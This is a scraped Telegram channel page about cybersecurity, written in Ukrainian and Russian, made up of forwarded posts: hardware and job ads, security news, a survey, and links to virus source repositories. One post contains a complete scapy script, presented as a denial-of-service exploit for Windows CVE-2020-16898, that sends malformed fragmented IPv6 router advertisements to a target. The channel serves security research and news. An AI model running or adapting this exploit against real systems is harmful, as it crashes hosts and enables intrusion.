Бінарний XOR
1.87K subscribers
386 photos
31 videos
146 files
551 links
Канал про кібербезпеку

Мій записничок і дошка оголошень

Відповідальність за застосування цих знань лежить на вас

По всім питанням @delst_the_xor
Download Telegram
Forwarded from TechMaker
Вже скоро у продажу наш сніфер для аналізу та реверсу CANbus автомобілів, мотоциклів, UAV та інших пристроїв.

Особливості:
- одночасний аналіз двох CAN шин через єдиний type-C usb.
- сумісний з усіма існуючими open-source інструментами, нативно підтримується ядром Linux.
- має вдосталь потужності для реалізації власних сценаріїв прямо в мізках сніфера
- інтегровані термінатори (резистори між CANH-CANL) CAN шини. Два перемикачі двозволяють підключити їх до двох шин окремо, у разі необхідності
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability

https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html

http://blog.pi3.com.pl/?p=780

BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
send(p)
Forwarded from DC8044 F33d
В рубрике проверенных вакансий у нас сегодня агонь предложение. Молодая компания OCTAL уверенно пробивается в лидеры рынка пентеста и по фидбекам людей, которые в ней работают, является несомненным топчиком как работодатель по урвню организации процессов и комфорту работы. Присоединяйтесь к возможно лучшей сайберсек тиме в наших краях!
Check out this job at OCTAL: Penetration Tester https://www.linkedin.com/jobs/view/2240951441
Forwarded from SecurityLab.ru (Pipiggi)
Мы часто слышим о том, что мир стоит на пороге технологической революции, которая изменит нашу жизнь к лучшему. Однако этого пока не произошло. Напротив, мы наблюдаем риски всеобщей цифровизации: вся жизнь современного общества построена вокруг технологий, а кибератаки могут поставить под удар нормальное функционирование городов или привести к настоящей техногенной катастрофе. Вариантом дальнейшего существования в таких условиях может стать предварительное моделирование угроз для критически важной инфраструктуры без последствий в реальном мире.

Речь идет о киберучениях – проведении контролируемых атак с целью проверки и улучшения навыков служб ИБ по обнаружению киберугроз и реагированию на них. Positive Technologies проводит опрос среди российских специалистов по информационной безопасности, чтобы выяснить, насколько востребованы российским бизнесом киберучения.

Пожалуйста ответьте на несколько вопросов: https://ru.research.net/r/MSB7VPS . Все данные будут использованы в обезличенном виде, а итоговый материал будет опубликован на сайте Positive Technologies.
Forwarded from Codeby
​​ASM – техники из старого сундука

Есть поговорка: "Программистами не рождаются – ими умирают". Исходя из этой парадигмы можно сделать вывод, что за долгий свой/программерский путь, у каждого из нас снежным комом накапливаются различные техники и алгоритмы, поделиться с общественностью которыми было-бы не грех. К примеру на этапе моего начинания, мир процессора для меня был так юн, что некоторые вещи не приобрели ещё свои имена и приходилось указывать на них пальцем. Позже, все просветления было решено записывать в блокнот, который постепенно разбух до увесистого романа. Фильтр элементарных заметок сделал своё дело и на данный момент в этом блокноте осталось ~1000 строк, которые я и решил сбросить сюда с краткими комментариями. Надеюсь у топика найдутся свои "евангелисты" и кто-нибудь почерпнёт с него что-то полезное.

Читать: https://codeby.net/threads/asm-texniki-iz-starogo-sunduka.75535/

#asm #cpuid #marylin
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
Forwarded from vx-underground
image_2020-11-01_14-59-33.png
21 KB
Мы представляем вам Cheshire от bot! Это первый полнофункциональный Java bytecode вирус, со времен вируса Strangebrew, выпущенного еще в 2001 году.

https://github.com/vxunderground/MalwareSourceCode/tree/main/Java/Virus.Java.Cheshire.a
Forwarded from Russian OSINT
​​Киберкомандование США вместе с CISA и ФБР поздравляет российских государственных хакеров с Хеллоуином!

По заявлению Киберкомандования США, ими было обнаружило восемь новых образцов вредоносного ПО, которые разработаны и развернуты российскими хакерами в ходе недавних атак.

Шесть из восьми образцов относятся к вредоносному ПО ComRAT (используется хакерской группой Turla), а два других являются образцами вредоносного ПО Zebrocy (используется хакерской группой APT28).

Первые жертвы этих вредоносных программ выявлены в Восточной Европе и Центральной Азии.

По заявлению ZDnet, цель правительства США - поделиться последними версиями этих хакерских инструментов с широкой публикой, чтобы системные администраторы и другие защитники обновили меры защиты.

https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a

И обязательный атрибут в конце любой статьи про русских хакеров это медведь, жаль без водки и закуски!
Forwarded from SecurityLab.ru (SecurityLab news)
В условиях массового перехода на удаленный режим работы 51% компаний в мире и 42% в России намерены расширить штат специалистов в области кибербезопасности. В связи с этим уже к следующему году компании могут столкнуться с дефицитом ИБ-специалистов. Об этом говорится в исследовании компании PwC.

https://www.securitylab.ru/news/513650.php
Forwarded from novitoll_ch (novitoll)
CVE-2020-12352. Продолжаю работу над эксплойтом по лику стэка структуры struct a2mp_info_rsp. Чет пока что хз как это использовать, но есть идеи. Так как, там структура __packed получается такие байты при лике.
Forwarded from Order of Six Angles
Я нашел и отдебажил один образец шифровальщика Hermes, который прекращает работу, если язык украинский или белорусский, но не русский (423 - белорусский, 422 - украинский), что тоже странно) Или забыли, или убрали хз

это к https://t.me/OrderOfSixAngles/897
Forwarded from vx-underground
У нас для вас еще один подгон - Linux.Kropotkine.

Этот 64 битный ELF вирус назван в честь Петра Кропо́ткина - русского революционера-анархиста.

Авторы: S01den, sblip

https://github.com/vxunderground/MalwareSourceCode/blob/main/Linux/Linux.Kropotkine.asm